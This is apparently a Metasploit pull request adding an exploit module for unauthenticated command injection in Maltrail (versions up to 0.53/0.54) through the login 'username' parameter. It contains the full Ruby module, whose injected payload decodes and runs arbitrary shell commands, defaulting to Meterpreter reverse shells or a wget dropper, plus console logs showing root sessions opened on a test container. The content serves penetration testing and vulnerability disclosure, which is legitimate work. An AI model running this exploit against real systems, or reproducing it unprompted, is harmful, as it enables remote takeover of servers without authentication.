### PR TITLE
Add Maltrail Unauthenticated RCE exploit

### DIFF
--- a/documentation/modules/exploit/unix/http/maltrail_rce.md
+++ b/documentation/modules/exploit/unix/http/maltrail_rce.md
@@ -1,0 +1,91 @@
+## Vulnerable Application
+
+Maltrail is a malicious traffic detection system, utilizing publicly
+available blacklists containing malicious and/or generally suspicious trails.
+The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
+The `subprocess.check_output` function in `mailtrail/core/http.py` contains
+a command injection vulnerability in the `params.get("username")` parameter.
+An attacker can exploit this vulnerability by injecting arbitrary OS commands
+into the username parameter. The injected commands will be executed with the
+privileges of the running process. This vulnerability can be exploited remotely
+without authentication.
+
+This issue was discovered and reported by Chris Wild @briskets.
+Check [here](https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/) for the original report.
+
+## Testing
+For installing the vulnerable version follow the steps below,
+1. Follow the manual installation steps given [here](https://github.com/stamparm/maltrail/tree/0.53#quick-start)
+2. After cloning the git project, simply do `git checkout 0.53` and proceed with the rest of the steps.
+
+After these steps the Maltrail web interface will be exposed on the `http://<target>:8338/`.
+
+## Verification Steps
+
+1. msfconsole
+2. Do: `use exploit/unix/http/maltrail_rce`
+3. Do: `set RHOST [IP]`
+4. Do: `check`
+
+## Options
+
+## Scenarios
+
+```
+msf6 > use exploit/unix/http/maltrail_rce 
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/maltrail_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/maltrail_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/maltrail_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.52
+[*] Executing Unix Command...
+[*] Sending stage (24772 bytes) to 172.17.0.2
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.17.0.2:42250) at 2023-08-10 22:31:03 +0200
+
+meterpreter > sysinfo 
+Computer     : bab669395cfe
+OS           : Linux 6.4.7-hardened1-2-hardened #1 SMP PREEMPT_DYNAMIC Wed, 02 Aug 2023 11:05:52 +0000
+Architecture : x64
+Meterpreter  : python/linux
+meterpreter > getuid 
+Server username: root
+meterpreter > 
+```
+
+```
+msf6 > use exploit/unix/http/maltrail_rce 
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(unix/http/maltrail_rce) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 exploit(unix/http/maltrail_rce) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(unix/http/maltrail_rce) > run
+
+[*] Started reverse TCP handler on 172.17.0.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version Detected: 0.52
+[*] Executing Linux Dropper...
+[*] Using URL: http://172.17.0.1:8080/Y9BtoN1
+[*] Client 172.17.0.2 (Wget/1.21.2) requested /Y9BtoN1
+[*] Sending payload to 172.17.0.2 (Wget/1.21.2)
+[*] Sending stage (3045380 bytes) to 172.17.0.2
+[*] Meterpreter session 2 opened (172.17.0.1:4444 -> 172.17.0.2:48664) at 2023-08-10 22:33:27 +0200
+[*] Command Stager progress - 100.00% done (110/110 bytes)
+[*] Server stopped.
+
+meterpreter > sysinfo 
+Computer     : 172.17.0.2
+OS           : Ubuntu 22.04 (Linux 6.4.7-hardened1-2-hardened)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > getuid 
+Server username: root
+meterpreter > 
+
+```

--- a/documentation/modules/exploit/unix/http/maltrail_rce.md
+++ b/documentation/modules/exploit/unix/http/maltrail_rce.md
@@ -25,7 +25,8 @@ After these steps the Maltrail web interface will be exposed on the `http://<tar
 1. msfconsole
 2. Do: `use exploit/unix/http/maltrail_rce`
 3. Do: `set RHOST [IP]`
-4. Do: `check`
+3. Do: `set LHOST [IP]`
+4. Do: `run`
 
 ## Options
 

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -107,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'ctype' => 'application/x-www-form-urlencoded'
       },
-      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh`" # We also need all the +
+      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh;#`" # We also need all the +
     )
   end
 

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return CheckCode::Appears("Version Detected: #{version}")
     end
 
-    CheckCode::Safe
+    CheckCode::Safe("Version Detected: #{version}")
   end
 
   def execute_command(cmd, _opts = {})

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-    version = res.body.match(%r{\(v<b>[0-9.]+</b>\)}).to_s.gsub('(v<b>', '').gsub('</b>)', '')
+            version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)
 
     if version <= Rex::Version.new('0.54')
       return CheckCode::Appears("Version Detected: #{version}")

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -93,7 +93,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}
 
-    if version <= Rex::Version.new('0.54')
+    if version < Rex::Version.new('0.54')
       return CheckCode::Appears("Version Detected: #{version}")
     end
 

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -91,7 +91,7 @@ class MetasploitModule < Msf::Exploit::Remote
     return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
     return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
 
-            version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)
+    version = Rex::Version.new(Regexp.last_match(1)) if res.body =~ %r{\(v<b>([0-9.]+)</b>\)}
 
     if version <= Rex::Version.new('0.54')
       return CheckCode::Appears("Version Detected: #{version}")

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -1,0 +1,124 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Maltrail Unauthenticated Command Injection',
+        'Description' => %q{
+          Maltrail is a malicious traffic detection system, utilizing publicly
+          available blacklists containing malicious and/or generally suspicious trails.
+          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
+          The `subprocess.check_output` function in `mailtrail/core/http.py` contains
+          a command injection vulnerability in the `params.get("username")` parameter.
+          An attacker can exploit this vulnerability by injecting arbitrary OS commands
+          into the username parameter. The injected commands will be executed with the
+          privileges of the running process. This vulnerability can be exploited remotely
+          without authentication.
+
+          Successfully tested against Maltrail 0.53 and 0.54.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege BALCI <egebalci[at]pm.me>', # msf module
+          'Chris Wild', # original PoC, analysis
+        ],
+        'References' => [
+          ['EDB', '51676'],
+          ['URL', 'https://huntr.dev/bounties/be3c5204-fbd9-448d-b97c-96a8d2941e87/'],
+          ['URL', 'https://github.com/stamparm/maltrail/issues/19146']
+        ],
+        'Platform' => ['unix', 'linux'],
+        'Privileged' => false,
+        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => :wget,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DisclosureDate' => '2023-07-31',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => []
+        }
+      )
+    )
+    register_options(
+      [
+        Opt::RPORT(8338),
+        OptString.new('TARGETURI', [ true, 'The URI of the Maltrail server', '/'])
+      ]
+    )
+  end
+
+  def check
+    res = send_request_cgi(
+      'uri' => normalize_uri(target_uri.path),
+      'method' => 'GET'
+    )
+    return CheckCode::Unknown("#{peer} - Could not connect to web service - no response") if res.nil?
+    return CheckCode::Unknown("#{peer} - Check URI Path, unexpected HTTP response code: #{res.code}") unless res.code == 200
+
+    version = res.body.match(%r{\(v<b>[0-9.]+</b>\)}).to_s.gsub('(v<b>', '').gsub('</b>)', '')
+
+    if version <= Rex::Version.new('0.54')
+      return CheckCode::Appears("Version Detected: #{version}")
+    end
+
+    CheckCode::Safe
+  end
+
+  def execute_command(cmd, _opts = {})
+    send_request_raw( # This needs to be a raw requess cuz we don't wanna URL encode the body
+      'uri' => normalize_uri(target_uri.path, 'login'),
+      'method' => 'POST',
+      'headers' => {
+        'ctype' => 'application/x-www-form-urlencoded'
+      },
+      'data' => "username=;`echo+\"#{Rex::Text.encode_base64(cmd)}\"+|+base64+-d+|+sh`" # We also need all the +
+    )
+  end
+
+  def exploit
+    case target['Type']
+    when :unix_cmd
+      print_status("Executing #{target.name}...")
+      execute_command(payload.encoded)
+    when :linux_dropper
+      print_status("Executing #{target.name}...")
+      execute_cmdstager
+    end
+  end
+end

--- a/modules/exploits/unix/http/maltrail_rce.rb
+++ b/modules/exploits/unix/http/maltrail_rce.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Description' => %q{
           Maltrail is a malicious traffic detection system, utilizing publicly
           available blacklists containing malicious and/or generally suspicious trails.
-          The Maltrail versions <= 0.54 is suffering from a command injection vulnerability.
+          The Maltrail versions < 0.54 is suffering from a command injection vulnerability.
           The `subprocess.check_output` function in `mailtrail/core/http.py` contains
           a command injection vulnerability in the `params.get("username")` parameter.
           An attacker can exploit this vulnerability by injecting arbitrary OS commands
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
           privileges of the running process. This vulnerability can be exploited remotely
           without authentication.
 
-          Successfully tested against Maltrail 0.53 and 0.54.
+          Successfully tested against Maltrail versions 0.52 and 0.53.
         },
         'License' => MSF_LICENSE,
         'Author' => [


### PR DESCRIPTION
Hello :wave:

This module exploits the command injection vulnerability for achieving unauthenticated remote code execution on the [Maltrail](https://github.com/stamparm/maltrail) version `<= v0.54`.

## Testing
For installing the vulnerable version follow the steps below,
1. Follow the manual installation steps given [here](https://github.com/stamparm/maltrail/tree/0.53#quick-start)
2. After cloning the git project, simply do `git checkout 0.53` and proceed with the rest of the steps.

**Note: Project can also be deployed with docker containers. Check [Dockerfile](https://github.com/stamparm/maltrail/blob/0.53/docker).**

After these steps the Maltrail web interface will be exposed on the `http://<target>:8338/`.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/unix/http/maltrail_rce`
- [ ] `set rhost [IP]`
- [ ] `set rport [PORT]`
- [ ] check
